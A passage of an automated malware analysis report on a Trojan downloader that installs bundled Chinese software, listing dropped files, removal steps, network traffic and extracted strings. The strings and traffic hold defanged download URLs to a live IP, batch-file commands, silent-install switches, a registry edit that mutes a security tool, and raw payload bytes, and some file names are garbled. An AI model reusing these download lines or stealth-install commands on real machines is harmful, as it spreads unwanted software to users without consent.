%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Update.exe (393 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\sfx\kzSetup_chs.sfx (3557 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\SLDefault.xml (196 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZModule.dll (6582 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZipShell.dll (981 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ali\kzshop.ico (1686 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZMount.exe (2890 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹.lnk (661 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZFormat.dll (2028 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\BSCoreNew.dll (4135 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Mount.dll (1490 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\finderlib.dll (314 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\kuaizipUpdateChecker.dll (981 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\KzNew.dat (74 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ZipNew.dat (22 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\MountCore.dll (863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (30622 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\__-________.URL (49 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KuaiZip.exe (9092 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\DiskOpt.exe (4605 bytes)
%Documents and Settings%\%current user%\Start Menu\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹.lnk (661 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\DuiLib.dll (4605 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ali\jp.png (392 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\lang\Chs_Lang.dll (824 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130929942969960000.dat (95 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\Upd.dat (23 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130929942969647500.dat (221 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%System%\drivers\KuaiZipDrive.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\zy[1] (474165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\2k[1] (914718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\lggj1[1] (923075 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (628772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ky[1] (542053 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mm[1] (4394 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: C
Product Name: ?????
Product Version: 3.1.2.0
Legal Copyright: C ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3.1.2.0
File Description: dc GZ
Comments: JAY
Language: English (United States)

Company Name: CProduct Name: ?????Product Version: 3.1.2.0Legal Copyright: C ????Legal Trademarks: Original Filename: Internal Name: File Version: 3.1.2.0File Description: dc GZComments: JAYLanguage: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	2244608	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	2248704	540672	539136	5.46282	e232362ddcfc6db9eea9b8d1f802cc48
.rsrc	2789376	20480	19968	2.75955	bd6493261293756979b5dda4085b4a41

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
dr.zc.baidu.com	61.135.186.100

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.153.147.73

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 26 Nov 2015 06:22:20 GMT

Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31

Content-Disposition: attachment; filename="zy"

Accept-Ranges: bytes

x-cdmi-object-size: 5592910

x-cdmi-create-time: 2015-08-20 15:54:27

Content-Length: 5592910

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: application/octet-stream;charset=UTF-8

......../...list_soft.xml.......................................................................................................................................................................................................................................................t...bluebox.png.............................................................................................................................................................................................................................................................hao123.png...........................................................................................................................................................................................................................................................WO.BlueBoxSetup.exe........................................................................................................................................................................................................................................................BlueNavigator_0_Setup.exe..............................................................................................................................................................................................................................................<?xml version="1.0" encoding="UTF-8" ?>..<Profile>.. <SoftwareList SuitLabel="............;............;">.. <Group GroupId="0" name="............">.. <Softw

<<< skipped >>>

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.153.147.73

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 26 Nov 2015 06:21:37 GMT

Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31

Content-Disposition: attachment; filename="mm"

Accept-Ranges: bytes

x-cdmi-object-size: 917568

x-cdmi-create-time: 2015-08-10 19:47:08

Content-Length: 917568

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/octet-stream;charset=UTF-8

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."r.Mf...f...f....\G.d...A...i...xAD.x...xAR.....A...E...f.......xAU.....xAE.g...xA@.g...Richf...........PE..L......U.................`...~...............p....@..........................`.......(..........................................h....`..t...............@...............................................@............p..........@....................text....^.......`.................. ..`.rdata..8U...p...V...d..............@..@.data............0..................@....rsrc...t....`......................@..@................................................................................................................................................................................................................................................................................................................................................................................................V.t$.....3....L$.....'...........D$.....RU.,2;...........F.SW.I.3...vj;.tj.....^......F..^.F.........?...@xE..X........?...@xE..X........?...@xE.....X...@xE.......F....F...;.r.;.u..L$._[ ....]tN...us.....V..............?...@xE..P........?...@xE..P......@xE....@.=... D$.^...........?..@xE.....P...@xE....=.H..H.... D$.^.3.^..............D$.=....u......P...............S.\$.W.|$.WS..\sE...u._[.VP..`sE.....t-WS..dsE..L$......v.......;.s........tV.u.;.r.^_3.[........#.^_[..........V.t$......W.|$.@...j.QW..XsE...u

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1612:

`.rsrc

t$(SSh

~%UVW

.tTPV

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

u$SShe

ole32.dll

user32.dll

urlmon

shell32.dll

RegOpenKeyA

RegEnumKeyA

MsgWaitForMultipleObjects

URLDownloadToFileA

D:\dream

D:\dream\win1.log

D:\dream\winky.log

360tray.exe

D:\dream\win2.log

D:\dream\winzmbd.log

hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/

C:\Users\Public\Desktop\UC

%Documents and Settings%\All Users\

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall\

Windows

C:\Users\Public\Desktop\2345

C:\Users\Public\Desktop\

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Content-Type: application/x-www-form-urlencoded

D:\dream\b2.bat

D:\dream\2k

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f

D:\dream\2345pic_k1252705.exe

D:\dream\2345pic_k1252705.exe -s1

2345pic_k1252705.exe

C:\Users\

%Documents and Settings%\

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall

D:\dream\1.bat

hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/

D:\dream\ky

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa

D:\dream\Kuaizip_Setup_7654_1061607.exe

D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo

D:\dream\ky.bat

hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/

D:\dream\b.bat

D:\dream\2b1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf

D:\dream\2b2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750

D:\dream\2b3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432

D:\dream\2b4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f

D:\dream\2b5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d

D:\dream\2345explorer_k1252705.exe

D:\dream\2345explorer_k1252705.exe -s1

2345explorer_k1252705.exe

hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/

D:\dream\zy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078

D:\dream\lgezy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d

D:\dream\BlueInstaller_bsvalkkx_101101_.exe

D:\dream\BlueResource.bpk

set "w71=Microsoft\Windows\Start Menu\Programs"

set "w72=Microsoft\Windows\Start Menu"

"%USERPROFILE%\%xp1%"

"%ALLUSERSPROFILE%\%xp1%"

"%USERPROFILE%\%xp2%"

"%ALLUSERSPROFILE%\%xp2%"

reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f

D:\dream\2.bat

hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/

D:\dream\7b1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0

D:\dream\7b2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3

D:\dream\7b3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586

D:\dream\7b4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0

D:\dream\7b5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6

D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe

D:\dream\bdllq.bat

hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/

D:\dream\uc1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423

D:\dream\uc2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f

D:\dream\uc3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5

D:\dream\uc4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c

D:\dream\uc5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e

D:\dream\uc6

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257

D:\dream\lgeuc

D:\dream\3.bat

hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/

D:\dream\LGGJ1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj1?public&code=4a75a81d3a3bd72da91812797aef200d

D:\dream\LGGJ2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj2?public&code=a6fa20fdd08e3ec9e3496d63a0eec383

D:\dream\LGGJ3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj3?public&code=a5f1a0eb336396b0f30042c519b63bf8

D:\dream\LGGJ4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj4?public&code=141c350ea3e5d691e30f16d167d73849

D:\dream\LGGJ5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj5?public&code=848235d5b4818734d8dfed8d52f909d5

D:\dream\lgegj

D:\dream\lggj.bat

hXXp://cnrdn.com/rd.htm?id=1489621&r=http://VVV.baidu.com/

D:\dream\zmbd

hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe

D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe

D:\dream\zmbd.bat

hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/

hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/

hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/

D:\MM-liao9728.exe

D:\MM-liao

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424

hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/

%Ui,)

tÃ¼V

1.2.18

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

portuguese-brazilian

iphlpapi.dll

SHLWAPI.dll

MPR.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

(*.avi)|*.avi

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

Service Pack %d

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows ??

Windows Millenium Edition

Windows 98 Second Edition

Windows 98 SP1

Windows 98

Windows 95 OSR2

Windows 95 SP1

Windows 95

Windows CE

Microsoft Windows Me

Microsoft Windows 98

Microsoft Windows 95

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT

KERNEL32.DLL

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÃ

Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\SofQI

x86 9.0.30729.4148

c:\%original file name%.exe

GetCPInfo

GetWindowsDirectoryA

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteA

GetKeyboardLayout

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

CreateDialogIndirectParamA

.text

.rdata

@.data

.rsrc

@.text

%Cou.N

????????

ADVAPI32.dll

AVIFIL32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

MSVFW32.dll

OLEAUT32.dll

RASAPI32.dll

SHELL32.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

(*.*)

3.1.2.0

%original file name%.exe_1612_rwx_00401000_002A7000:

t$(SSh

~%UVW

.tTPV

FTPjK

FtPj;

F.PjRWj

u.WWj

u.VVj

u$SShe

ole32.dll

user32.dll

urlmon

shell32.dll

RegOpenKeyA

RegEnumKeyA

MsgWaitForMultipleObjects

URLDownloadToFileA

D:\dream

D:\dream\win1.log

D:\dream\winky.log

360tray.exe

D:\dream\win2.log

D:\dream\winzmbd.log

hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/

C:\Users\Public\Desktop\UC

%Documents and Settings%\All Users\

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall\

Windows

C:\Users\Public\Desktop\2345

C:\Users\Public\Desktop\

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Content-Type: application/x-www-form-urlencoded

D:\dream\b2.bat

D:\dream\2k

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f

D:\dream\2345pic_k1252705.exe

D:\dream\2345pic_k1252705.exe -s1

2345pic_k1252705.exe

C:\Users\

%Documents and Settings%\

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall

D:\dream\1.bat

hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/

D:\dream\ky

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa

D:\dream\Kuaizip_Setup_7654_1061607.exe

D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo

D:\dream\ky.bat

hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/

D:\dream\b.bat

D:\dream\2b1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf

D:\dream\2b2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750

D:\dream\2b3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432

D:\dream\2b4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f

D:\dream\2b5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d

D:\dream\2345explorer_k1252705.exe

D:\dream\2345explorer_k1252705.exe -s1

2345explorer_k1252705.exe

hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/

D:\dream\zy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078

D:\dream\lgezy

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d

D:\dream\BlueInstaller_bsvalkkx_101101_.exe

D:\dream\BlueResource.bpk

set "w71=Microsoft\Windows\Start Menu\Programs"

set "w72=Microsoft\Windows\Start Menu"

"%USERPROFILE%\%xp1%"

"%ALLUSERSPROFILE%\%xp1%"

"%USERPROFILE%\%xp2%"

"%ALLUSERSPROFILE%\%xp2%"

reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f

D:\dream\2.bat

hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/

D:\dream\7b1

